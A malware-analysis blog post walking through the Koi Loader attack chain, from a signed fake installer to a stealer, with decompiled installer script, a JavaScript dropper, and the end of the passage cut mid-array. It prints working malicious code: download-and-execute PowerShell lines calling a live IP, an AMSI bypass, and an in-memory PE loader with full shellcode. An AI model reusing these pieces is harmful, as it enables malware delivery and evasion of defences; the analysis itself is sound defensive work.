Thinkbox

Koi Loader Attack Chain Analysis

Aleks — Wed, 21 May 2025 18:51:44 GMT

Overview

This post will cover at a high level the attack chain that Koi Loader takes in order to deploy Koi stealer on a system. All artifacts and samples were retrieved from Malware Traffic.

Fake Installer Initial Execution

Fake Installer

Initial access for this sample took the form of a digitally signed fake installer file.

Digitally Signed Fake Installer

The executable was signed with a valid certificate issued by the certificate authority Certum to Zhengzhou Lichang Network Technology Co., Ltd.

SignerCertificate      : [Subject]
                           CN="Zhengzhou Lichang Network Technology Co., Ltd.", O="Zhengzhou Lichang Network
                         Technology Co., Ltd.", L=Zhengzhou, S=Henan, C=CN, SERIALNUMBER=91410122MA40Y0N9XP,
                         OID.1.3.6.1.4.1.311.60.2.1.1=Zhengzhou, OID.1.3.6.1.4.1.311.60.2.1.2=Henan,
                         OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization

                         [Issuer]
                           CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL

                         [Serial Number]
                           04EBDA42BF9235AECF2E07587EC4623F

                         [Not Before]
                           11/20/2024 10:40:35 PM

                         [Not After]
                           11/20/2025 10:40:34 PM

                         [Thumbprint]
                           B78EDD5FFE3A45F2993E98F9CCE5F0187EE880BD

Certificate of Fake Installer

The fake installer was created with Inno Setup. The software InnoUnpacker can be used to extract the contents of this installer file.

Contents of Fake Installer

This installer packages multiple files; however, they are only dummy files and are never used or dropped to the system.

Dummy Program from Fake Installer

Inno Setup lets an author extend the created installer through its Pascal scripting feature. Any scripts added are compiled and stored in the CompiledCode.bin file.

Hexdump of CompiledCode.bin

Within the strings of CompiledCode.bin we can see malicious PowerShell commands.

Strings from CompiledCode.bin
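As a rough illustration of how such strings can be surfaced, the following sketch scans a binary blob for printable ASCII and UTF-16LE runs and keeps those containing a few keywords. The function names, the keyword list, and the minimum length are assumptions made for this example, and the decompiled output further down suggests the command is stored as a Unicode string, which is why UTF-16LE is included.

```python
import re

def extract_strings(blob: bytes, min_len: int = 6):
    """Return printable ASCII and UTF-16LE strings found in a binary blob."""
    ascii_pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_pattern.finditer(blob)]
    found += [m.group().decode("utf-16-le") for m in utf16_pattern.finditer(blob)]
    return found

def suspicious_strings(blob: bytes, keywords=("powershell", "http", "wscript")):
    """Keep only strings that contain one of the (hypothetical) keywords."""
    return [s for s in extract_strings(blob) if any(k in s.lower() for k in keywords)]
```

It could be run as `suspicious_strings(open("CompiledCode.bin", "rb").read())` on the file extracted from the installer.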

The following is the entire decompiled version of CompiledCode.bin, produced with IFPSTools.NET.

.version 23

.entry !MAIN

.type primitive(Pointer) Pointer
.type primitive(U32) U32
.type primitive(Variant) Variant
.type primitive(PChar) PChar
.type primitive(Currency) Currency
.type primitive(Extended) Extended
.type primitive(Double) Double
.type primitive(Single) Single
.type primitive(S64) S64
.type primitive(String) String
.type primitive(U32) U32_2
.type primitive(S32) S32
.type primitive(S16) S16
.type primitive(U16) U16
.type primitive(S8) S8
.type(export) funcptr(void()) ANYMETHOD
.type primitive(String) String_2
.type primitive(UnicodeString) UnicodeString
.type primitive(UnicodeString) UnicodeString_2
.type primitive(String) String_3
.type primitive(UnicodeString) UnicodeString_3
.type primitive(WideString) WideString
.type primitive(WideChar) WideChar
.type primitive(WideChar) WideChar_2
.type primitive(Char) Char
.type primitive(U8) U8
.type primitive(U16) U16_2
.type primitive(U32) U32_3
.type(export) primitive(U8) BOOLEAN
.type primitive(U8) U8_2
.type(export) class(TWIZARDFORM) TWIZARDFORM
.type(export) class(TMAINFORM) TMAINFORM
.type(export) class(TUNINSTALLPROGRESSFORM) TUNINSTALLPROGRESSFORM
.type(export) primitive(U8) TEXECWAIT

.global(import) TWIZARDFORM WIZARDFORM
.global(import) TMAINFORM MAINFORM
.global(import) TUNINSTALLPROGRESSFORM UNINSTALLPROGRESSFORM

.function(export) void !MAIN()
	ret

.function(export) BOOLEAN INITIALIZESETUP()
	pushtype S32 ; StackCount = 1
	pushvar RetVal ; StackCount = 2
	call WIZARDSILENT
	pop ; StackCount = 1
	pushtype BOOLEAN ; StackCount = 2
	assign Var2, RetVal
	setz Var2
	sfz Var2
	pop ; StackCount = 1
	jf loc_27b
	pushtype BOOLEAN ; StackCount = 2
	pushtype Pointer ; StackCount = 3
	setptr Var3, Var1
	pushtype TEXECWAIT ; StackCount = 4
	assign Var4, TEXECWAIT(0)
	pushtype S32 ; StackCount = 5
	assign Var5, S32(0)
	pushtype UnicodeString_2 ; StackCount = 6
	assign Var6, UnicodeString_3("")
	pushtype UnicodeString_2 ; StackCount = 7
	assign Var7, UnicodeString_3("-command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\\vqPM0l4stR.js'); wscript ($env:temp+'\\vqPM0l4stR.js');")
	pushtype UnicodeString_2 ; StackCount = 8
	pushtype UnicodeString_2 ; StackCount = 9
	assign Var9, UnicodeString_3("{sysnative}\\WindowsPowerShell\\v1.0\\powershell.exe")
	pushvar Var8 ; StackCount = 10
	call EXPANDCONSTANT
	pop ; StackCount = 9
	pop ; StackCount = 8
	pushvar Var2 ; StackCount = 9
	call EXEC
	pop ; StackCount = 8
	pop ; StackCount = 7
	pop ; StackCount = 6
	pop ; StackCount = 5
	pop ; StackCount = 4
	pop ; StackCount = 3
	pop ; StackCount = 2
	pop ; StackCount = 1
loc_27b:
	ret

.function(import) external internal returnsval WIZARDSILENT()

.function(import) external internal returnsval EXEC(__in __unknown,__in __unknown,__in __unknown,__in __unknown,__in __unknown,__out __unknown)

.function(import) external internal returnsval EXPANDCONSTANT(__in __unknown)

Decompiled Pascal Script from Inno Setup

From this decompiled code we can determine that the installer first downloads a JavaScript file and writes it to a temporary directory, and then invokes the JavaScript file via wscript.

IWR -UseBasicParsing -Uri 'hxxp://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js');
wscript ($env:temp+'\vqPM0l4stR.js');

The following diagram summarizes the core steps the fake installer will take in order to execute Koi Loader, which will subsequently run Koi Stealer. The next sections will dive deeper into each step taken after the execution of the fake installer.

Fake Installer Flow Diagram

Download #1 - Malicious Javascript Code

The first step after the execution of the fake installer is the download of malicious Javascript code that will be written to a temporary folder.

The fake installer will directly execute:

IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\\vqPM0l4stR.js');

This will result in the Javascript file download over HTTP.

Network Request from Javascript File

This script is responsible for downloading and running two separate PowerShell scripts:

hxxp://79.124.78.109/wp-includes/phyllopodan7V7GD.php: AMSI Bypass Script
hxxp://79.124.78.109/wp-includes/barasinghaby.ps1: Koi Loader Downloader

// Create file system object for file manipulation
var fso = new ActiveXObject("Scripting.FileSystemObject");

// Create Windows Script Host object to run system commands
var wsh = new ActiveXObject("WScript.Shell");

// Pick the PowerShell folder from the CPU address width: SysWOW64 (32-bit PowerShell) on 64-bit systems, System32 otherwise
var systemFolder = GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth == 64 ? "SysWOW64" : "System32";

// Get the path to PowerShell executable based on system architecture
var powershellPath = wsh.ExpandEnvironmentStrings("%SYSTEMROOT%") + "\\" + systemFolder + "\\WindowsPowerShell\\v1.0\\powershell.exe";

// Generate a unique filename based on MachineGuid from the registry
var uniqueFileName = 'r' + wsh.RegRead('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid') + 'r.js';

// Check if the current script is already named with the unique filename
if (WScript.ScriptName != uniqueFileName) {
    try {
        // Copy the current script to the ProgramData folder with the unique name
        fso.CopyFile(WScript.ScriptFullName, wsh.ExpandEnvironmentStrings("%programdata%") + "\\" + uniqueFileName);
    } catch (e) {
        // Handle any errors (e.g., permission issues)
    }
}

// Define a temporary file name for a potential malicious file
var tempFileName = "7zTJRTNUX3VD";
var tempFilePath = wsh.ExpandEnvironmentStrings("%temp%") + "\\" + tempFileName;

// Try to delete the temporary file if it exists
try {
    fso.DeleteFile(tempFilePath);
} catch (e) {
    // Handle any errors (e.g., file not found)
}

// Check if the temporary file does not exist
if (!fso.FileExists(tempFilePath)) {
    // Run the PowerShell command to download and execute malicious scripts
    var command = powershellPath + " -command \"$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; " +
                  "$l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; " +
                  "$a = [Ref].Assembly.GetTypes(); " +
                  "foreach ($b in $a) { if ($b.Name -like '*siU*s') { $c = $b } }; " +
                  "$env:paths = '" + tempFileName + "'; " +
                  "IEX (Invoke-WebRequest -UseBasicParsing $l1); " +
                  "IEX (Invoke-WebRequest -UseBasicParsing $l2)\"";
    wsh.Run(command, 0);
}

Malicious Javascript File
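For hunting purposes, the name of the copy that the script drops can be reproduced from a host's MachineGuid. The sketch below mirrors the string concatenation in the JavaScript; the function name and the default ProgramData location are assumptions for illustration.

```python
import ntpath

def dropped_copy_path(machine_guid: str, program_data: str = r"C:\ProgramData") -> str:
    """Rebuild the path the script copies itself to: %programdata%\\r<MachineGuid>r.js."""
    return ntpath.join(program_data, "r" + machine_guid + "r.js")
```

Calling `dropped_copy_path` with the value read from `HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid` gives the file name to look for on that host.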

Download #2 - AMSI Bypass

The first PowerShell script to be downloaded and executed contains an AMSI bypass.

AMSI Bypass Script over Network

# Define a string pattern to be matched
$pattern = "yyWubZA2bLJUiTqmHcYttKZ7DIVYqf47J6AeiTqmHcYttKZ7jq9faTN5t7IeiTqmHcYttKZ7SuwSufiXjG2hiTqmHcYttKZ7jd78eScwXsGtiTqmHcYttKZ71CcOWkfJwaYtiTqmHcYttKZ7pGvxphMdyojsiTqmHcYttKZ7aq2glEPfEC9F"

# -match returns a boolean, so $matchedString is $true here
$matchedString = $pattern -match "iTqmHcYttKZ7"

# Get non-public static fields of the type stored in $c
# ($c is set by the PowerShell command that the JavaScript file launches)
$fields = $c.GetFields("NonPublic,Static")

# Iterate over the fields and set values based on a condition
foreach ($field in $fields) {
    if ($field.Name -like "*am*ed") {
        $field.SetValue($null, $matchedString)
    }
}

AMSI Bypass
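The two wildcard patterns avoid spelling out the well-known AMSI names. The sketch below approximates PowerShell's case-insensitive -like operator with Python's fnmatch to show which names the patterns select. The candidate lists are illustrative assumptions, not an enumeration taken from the sample.

```python
from fnmatch import fnmatchcase

def ps_like(value: str, pattern: str) -> bool:
    """Approximate PowerShell's case-insensitive -like for simple wildcard patterns."""
    return fnmatchcase(value.lower(), pattern.lower())

# Illustrative candidates (assumed, not taken from the sample)
type_names = ["AmsiUtils", "PSObject", "Utils"]
field_names = ["amsiContext", "amsiSession", "amsiInitFailed", "amsiLockObject"]

matched_types = [n for n in type_names if ps_like(n, "*siU*s")]
matched_fields = [n for n in field_names if ps_like(n, "*am*ed")]
print(matched_types, matched_fields)
```

Under these assumptions the type pattern selects AmsiUtils and the field pattern selects amsiInitFailed, which the script then sets to the boolean result of the -match expression.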

Download #3 - Koi Loader Download

The second Powershell script downloaded and executed is responsible for the execution of Koi loader.

Koi Loader Downloader

The PowerShell script contains a hardcoded URL, hxxp://79.124.78.109/wp-includes/guestwiseYtHA.exe, from which Koi Loader is downloaded. In addition, the script contains shellcode that is used to map the Koi Loader PE into memory.

[Byte[]]$targetPE = (IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/guestwiseYtHA.exe').Content;

function GDT
{
    Param
    (
        [OutputType([Type])]
            
        [Parameter( Position = 0)]
        [Type[]]
        $Parameters = (New-Object Type[](0)),
            
        [Parameter( Position = 1 )]
        [Type]
        $ReturnType = [Void]
    )

    $DA = New-Object System.Reflection.AssemblyName('RD')
    $AB = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DA, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
    $MB = $AB.DefineDynamicModule('IMM', $false)
    $TB = $MB.DefineType('MDT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $CB = $TB.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
    $CB.SetImplementationFlags('Runtime, Managed')
    $MB = $TB.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
    $MB.SetImplementationFlags('Runtime, Managed')
        
    Write-Output $TB.CreateType()
}

function GPA
{
    Param
    (
        [OutputType([IntPtr])]
        
        [Parameter( Position = 0, Mandatory = $True )]
        [String]
        $Module,
            
        [Parameter( Position = 1, Mandatory = $True )]
        [String]
        $Procedure
    )

    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null)
    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
    $tmpPtr = New-Object IntPtr
    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
        
    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}

$marshal = [System.Runtime.InteropServices.Marshal]

[Byte[]]$peMappingShellcode = 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x56, 0x57, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x40, 0x0C, 0x8B, 0x00, 0x8B, 0x00, 0x8B, 0x40, 0x18, 0x89, 0x45, 0xF8, 0x8B, 0x75, 0xF8, 0xBA, 0xF1, 0xF0, 0xAD, 0x0A, 0x8B, 0xCE, 0xE8, 0xD2, 0x01, 0x00, 0x00, 0xBA, 0x03, 0x1D, 0x3C, 0x0B, 0x89, 0x45, 0xF0, 0x8B, 0xCE, 0xE8, 0xC3, 0x01, 0x00, 0x00, 0xBA, 0xE3, 0xCA, 0xD8, 0x03, 0x89, 0x45, 0xEC, 0x8B, 0xCE, 0xE8, 0xB4, 0x01, 0x00, 0x00, 0x8B, 0xD8, 0x8B, 0x45, 0x08, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8B, 0x70, 0x3C, 0x03, 0xF0, 0x89, 0x75, 0xFC, 0xFF, 0x76, 0x50, 0xFF, 0x76, 0x34, 0xFF, 0xD3, 0x8B, 0xF8, 0x85, 0xFF, 0x75, 0x17, 0x6A, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0xFF, 0x76, 0x50, 0x50, 0xFF, 0xD3, 0x8B, 0xF8, 0x85, 0xFF, 0x0F, 0x84, 0x66, 0x01, 0x00, 0x00, 0x8B, 0x56, 0x54, 0x85, 0xD2, 0x74, 0x18, 0x8B, 0x75, 0x08, 0x8B, 0xCF, 0x2B, 0xF7, 0x8A, 0x04, 0x0E, 0x8D, 0x49, 0x01, 0x88, 0x41, 0xFF, 0x83, 0xEA, 0x01, 0x75, 0xF2, 0x8B, 0x75, 0xFC, 0x0F, 0xB7, 0x4E, 0x14, 0x33, 0xC0, 0x03, 0xCE, 0x33, 0xDB, 0x89, 0x4D, 0xF4, 0x66, 0x3B, 0x46, 0x06, 0x73, 0x44, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0F, 0xB7, 0xC3, 0x8D, 0x04, 0x80, 0x8B, 0x54, 0xC1, 0x28, 0x8B, 0x74, 0xC1, 0x2C, 0x8B, 0x4C, 0xC1, 0x24, 0x03, 0x75, 0x08, 0x03, 0xCF, 0x85, 0xD2, 0x74, 0x13, 0x2B, 0xF1, 0x0F, 0x1F, 0x00, 0x8A, 0x04, 0x0E, 0x8D, 0x49, 0x01, 0x88, 0x41, 0xFF, 0x83, 0xEA, 0x01, 0x75, 0xF2, 0x8B, 0x75, 0xFC, 0x43, 0x8B, 0x4D, 0xF4, 0x66, 0x3B, 0x5E, 0x06, 0x72, 0xC5, 0x8B, 0x86, 0x80, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x76, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x14, 0x72, 0x6D, 0x83, 0x7C, 0x38, 0x0C, 0x00, 0x8D, 0x1C, 0x38, 0x89, 0x5D, 0x08, 0x74, 0x60, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8B, 0x43, 0x0C, 0x03, 0xC7, 0x50, 0xFF, 0x55, 0xF0, 0x8B, 0xD0, 0x89, 0x55, 0xF4, 0x85, 0xD2, 0x74, 0x3A, 0x8B, 0x73, 0x10, 0x8B, 0x0B, 0x85, 0xC9, 0x8D, 0x1C, 0x3E, 0x0F, 0x45, 0xF1, 0x03, 0xF7, 0x8B, 0x06, 0x85, 0xC0, 0x74, 0x22, 0x79, 
0x05, 0x0F, 0xB7, 0xC0, 0xEB, 0x05, 0x83, 0xC0, 0x02, 0x03, 0xC7, 0x50, 0x52, 0xFF, 0x55, 0xEC, 0x8B, 0x55, 0xF4, 0x83, 0xC6, 0x04, 0x89, 0x03, 0x83, 0xC3, 0x04, 0x8B, 0x06, 0x85, 0xC0, 0x75, 0xDE, 0x8B, 0x5D, 0x08, 0x83, 0xC3, 0x14, 0x89, 0x5D, 0x08, 0x83, 0x7B, 0x0C, 0x00, 0x75, 0xA8, 0x8B, 0x75, 0xFC, 0x8B, 0xDF, 0x2B, 0x5E, 0x34, 0x83, 0xBE, 0xA4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x52, 0x8B, 0x86, 0xA0, 0x00, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x48, 0x83, 0x3C, 0x38, 0x00, 0x8D, 0x14, 0x38, 0x74, 0x3F, 0x0F, 0x1F, 0x40, 0x00, 0x8B, 0x72, 0x04, 0x8D, 0x42, 0x04, 0x83, 0xEE, 0x08, 0x89, 0x45, 0x08, 0xD1, 0xEE, 0xB9, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1C, 0x0F, 0xB7, 0x44, 0x4A, 0x08, 0x66, 0x85, 0xC0, 0x74, 0x0A, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x03, 0x02, 0x01, 0x1C, 0x38, 0x41, 0x3B, 0xCE, 0x72, 0xE7, 0x8B, 0x45, 0x08, 0x03, 0x10, 0x83, 0x3A, 0x00, 0x75, 0xC8, 0x8B, 0x75, 0xFC, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x89, 0x78, 0x08, 0x8B, 0x46, 0x28, 0x03, 0xC7, 0xFF, 0xD0, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF8, 0x56, 0x57, 0x33, 0xFF, 0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x48, 0x1C, 0x8B, 0x50, 0x24, 0x03, 0xCB, 0x03, 0xD3, 0x89, 0x4D, 0xEC, 0x8B, 0x48, 0x20, 0x03, 0xCB, 0x89, 0x55, 0xF0, 0x8B, 0x50, 0x18, 0x89, 0x4D, 0xF4, 0x89, 0x55, 0xFC, 0x85, 0xD2, 0x74, 0x4B, 0x0F, 0x1F, 0x44, 0x00, 0x00, 0x8B, 0x34, 0xB9, 0x03, 0xF3, 0x74, 0x3A, 0x8A, 0x0E, 0x33, 0xC0, 0x84, 0xC9, 0x74, 0x2A, 0x90, 0xC1, 0xE0, 0x04, 0x8D, 0x76, 0x01, 0x0F, 0xBE, 0xC9, 0x03, 0xC1, 0x8B, 0xD0, 0x81, 0xE2, 0x00, 0x00, 0x00, 0xF0, 0x74, 0x07, 0x8B, 0xCA, 0xC1, 0xE9, 0x18, 0x33, 0xC1, 0x8A, 0x0E, 0xF7, 0xD2, 0x23, 0xC2, 0x84, 0xC9, 0x75, 0xDA, 0x8B, 0x55, 0xFC, 0x3B, 0x45, 0xF8, 0x74, 0x11, 0x8B, 0x4D, 0xF4, 0x47, 0x3B, 0xFA, 0x72, 0xBA, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45, 0xF0, 0x8B, 0x4D, 0xEC, 
0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC

$VAAddr = GPA kernel32.dll VirtualAlloc
$VADeleg = GDT @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])
$VA = $marshal::GetDelegateForFunctionPointer($VAAddr, $VADeleg)
$CTAddr = GPA kernel32.dll CreateThread
$CTDeleg = GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
$CT = $marshal::GetDelegateForFunctionPointer($CTAddr, $CTDeleg)
$WFSOAddr = GPA kernel32.dll WaitForSingleObject
$WFSODeleg = GDT @([IntPtr], [Int32]) ([Int])
$WFSO = $marshal::GetDelegateForFunctionPointer($WFSOAddr, $WFSODeleg)

# Put PE Mapping Shellcode into RWX Buffer (0x40 = PAGE_EXECUTE_READWRITE)
$peMappingShellcodeBuffer=$VA.Invoke(0,$peMappingShellcode.Length, 0x3000, 0x40)
$marshal::Copy($peMappingShellcode, 0, $peMappingShellcodeBuffer, $peMappingShellcode.Length);

# Put Target PE File into Buffer
$targetPEBuffer = $marshal::AllocHGlobal($targetPE.Length)
$marshal::Copy($targetPE, 0, $targetPEBuffer, $targetPE.Length);

# Run the PE Mapping Shellcode as Thread, and Pass the Target PE File as Parameter
$thread = $CT.Invoke([int]$false, [int]$false, $peMappingShellcodeBuffer, $targetPEBuffer, 0, 0);
$WFSO.Invoke($thread, -1);

Koi Loader Downloader Script
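The opening bytes of the shellcode load three constants into edx (opcode 0xBA) before calling a helper, and the helper at the end of the shellcode appears to hash export names with a shift-by-4 routine that looks like the classic ELF/PJW string hash. The following sketch, written under that reading, pulls the constants out of the first bytes listed above and compares them with a short list of candidate API names. The candidate list and function names are assumptions, and the byte scan is a naive pattern match, not a disassembler.

```python
import re
import struct

# First 76 bytes of $peMappingShellcode as listed in the script above
SHELLCODE_PROLOGUE = bytes.fromhex(
    "55 8B EC 83 EC 14 53 56 57 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00"
    " 8B 40 18 89 45 F8 8B 75 F8 BA F1 F0 AD 0A 8B CE E8 D2 01 00 00"
    " BA 03 1D 3C 0B 89 45 F0 8B CE E8 C3 01 00 00"
    " BA E3 CA D8 03 89 45 EC 8B CE E8 B4 01 00 00"
)

def elf_style_hash(name: str) -> int:
    """Shift-by-4 string hash with the top nibble folded back in."""
    h = 0
    for ch in name:
        h = (h << 4) + ord(ch)
        high = h & 0xF0000000
        if high:
            h ^= high >> 24
        h &= ~high
    return h

def extract_hash_constants(code: bytes):
    """Collect the imm32 of every `mov edx, imm32` byte pattern (naive scan)."""
    return [struct.unpack("<I", m.group(1))[0]
            for m in re.finditer(rb"\xBA(.{4})", code, re.DOTALL)]

# Hypothetical candidate names to test against the extracted constants
CANDIDATES = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect", "CreateThread"]
lookup = {elf_style_hash(name): name for name in CANDIDATES}

for value in extract_hash_constants(SHELLCODE_PROLOGUE):
    print(f"0x{value:08X} -> {lookup.get(value, 'unknown')}")
```

With these candidates the three constants line up with LoadLibraryA, GetProcAddress and VirtualAlloc, which is consistent with a routine that allocates memory for the image and then resolves its imports.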

Koi Loader Analysis

Unpacking

Koi Loader is initially delivered in a packed form, and the true Koi Loader is only executed after unpacking. The packer starts with junk code and ends with a function that initiates the unpacking logic.

Main function of the Koi Loader Packer

The core unpacking function will take the following steps:

Retrieve the encrypted Koi loader payload from resource 54518.
Retrieve the XOR keystream from resource 39596.
Decrypt the encrypted Koi loader payload.
Map the Koi loader inside memory.
Execute the entrypoint of Koi loader.

Core Unpacking Logic

The loader had one instance of API hash resolution in the function that fetches the contents of a specified resource.

Resource Fetching Function

The following script was created in order to implement the API hashing routine and understand the three API hashes used in the function.

import pefile

def hash_string(string):
    
    api_hash = 0
    
    for current_char in string:
        
        api_hash = (api_hash * 16) + ord(current_char)
        loop_value_temp = api_hash & 0xF0000000
        
        if loop_value_temp != 0:
            api_hash = (loop_value_temp >> 0x18) ^ api_hash
            
        api_hash = api_hash & (~loop_value_temp)
            
    return api_hash
 

def resolve_hashes(dll_path, hashes):
    pe = pefile.PE(dll_path)

    if not hasattr(pe, 'DIRECTORY_ENTRY_EXPORT'):
        print("[-] No export table found.")
        return

    print(f"[+] Exported functions in: {dll_path}\n")

    for i, exp in enumerate(pe.DIRECTORY_ENTRY_EXPORT.symbols):
        name = exp.name.decode() if exp.name else ""
        ordinal = exp.ordinal
        address = hex(pe.OPTIONAL_HEADER.ImageBase + exp.address)
        
        if hash_string(name) in hashes:
            print(hex(hash_string(name)))
            print(f"{i+1:3}: {name:40} Ordinal: {ordinal:5} Address: {address}")

# === Main ===
if __name__ == "__main__":
    
    hashes = [0x5681127, 0x9B3B115, 0xDAA96B5]
    
    dll_path = r"C:\Windows\System32\kernel32.dll"
    resolve_hashes(dll_path, hashes)
    
    # Example, should return 0x0BA853A5
    #print(hex(hash_string("AcquireSRWLockExclusive")))

API Hash resolver

The core of this unpacking routine is to extract the XOR keystream and encrypted payload from the resource.

Resources in Packed Koi Loader

However, each byte of the encrypted payload is followed by a 00 byte. The packer accounts for this by multiplying the index into the encrypted data by 2 in order to skip each 00.

Skipping Each 00 in Encrypted Payload

The following script was written to parse the encrypted payload and XOR keystream and decrypt the contents.

import pefile

def extract_resource_by_id(pe_path, resource_id):
    pe = pefile.PE(pe_path)

    if not hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
        print("[-] No resources found in this PE file.")
        return

    for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries:
        if entry.name is not None:
            continue  # Skip named root entries

        if entry.id == pefile.RESOURCE_TYPE['RT_RCDATA']:  # RCDATA is most common for custom binary blobs
            for res in entry.directory.entries:
                if res.id == resource_id:
                    data_rva = res.directory.entries[0].data.struct.OffsetToData
                    size = res.directory.entries[0].data.struct.Size
                    data_offset = pe.get_offset_from_rva(data_rva)
                    data = pe.__data__[data_offset:data_offset+size]
                    
                    print(f"[+] Found resource ID {resource_id}, size: {size} bytes")
                    return data, size

    print(f"[-] Resource with ID {resource_id} not found.")
    return None

def unpack(pe_path, xor_keystream_resource_id, encrypted_payload_resource_id):

    keystream_resource = extract_resource_by_id(pe_path, xor_keystream_resource_id)
    payload_resource = extract_resource_by_id(pe_path, encrypted_payload_resource_id)

    # extract_resource_by_id returns None when a resource is missing
    if keystream_resource is None or payload_resource is None:
        return

    xor_keystream, xor_keystream_size = keystream_resource
    encrypted_payload, _ = payload_resource

    # Every second byte is a 00 filler, so keep only the bytes at even offsets
    encrypted_payload_2 = encrypted_payload[::2]

    # XOR each remaining byte with the repeating keystream
    decrypted_payload = bytes(
        value ^ xor_keystream[i % xor_keystream_size]
        for i, value in enumerate(encrypted_payload_2)
    )

    if decrypted_payload:
        with open("decrypted_payload.bin", "wb") as f:
            f.write(decrypted_payload)
        print("[+] Resource dumped to decrypted_payload.bin")


if __name__ == "__main__":
    pe_path = r"2025-01-23-http___79.124.78.109_wp-includes_guestwiseYtHA.exe.bin" 
    xor_keystream_resource_id = 39596
    encrypted_payload_resource_id = 54518

    unpack(pe_path, xor_keystream_resource_id, encrypted_payload_resource_id)

Decrypt Koi Loader from Resources
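A quick way to confirm that the decryption worked is to check that the output looks like a PE file. The sketch below is a minimal sanity check, not a full PE parser; the function name is an assumption for this example. It tests for the MZ magic and for the PE signature at the offset stored at 0x3C.

```python
import struct

def looks_like_pe(data: bytes) -> bool:
    """Check for the MZ magic and for a PE signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
```

It could be applied to the dumped file with `looks_like_pe(open("decrypted_payload.bin", "rb").read())`.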

Core Koi Loader

The core of Koi Loader downloads another PowerShell script and executes it. Which script is downloaded depends on the version of .NET available on the system, because Koi Stealer is written in C# using .NET.

The following is the Powershell script that contains an encrypted version of Koi stealer embedded. This will be decrypted and loaded into memory.

[byte[]] $bindata = 0x09, 
0x12, 0xd9, 0x38, 0x30, 0x6c, 0x33, 0x6b, 0x31, 0x6c, 0x48, 0x49, 0xb7, 0xae, 0x79, 0x61, 
0x88, 0x6b, 0x4e, 0x75, 0x44, 0x48, 0x49, 0x38, 0x73, 0x6c, 0x33, 0x6b, 0x35, 0x6c, 0x48, 
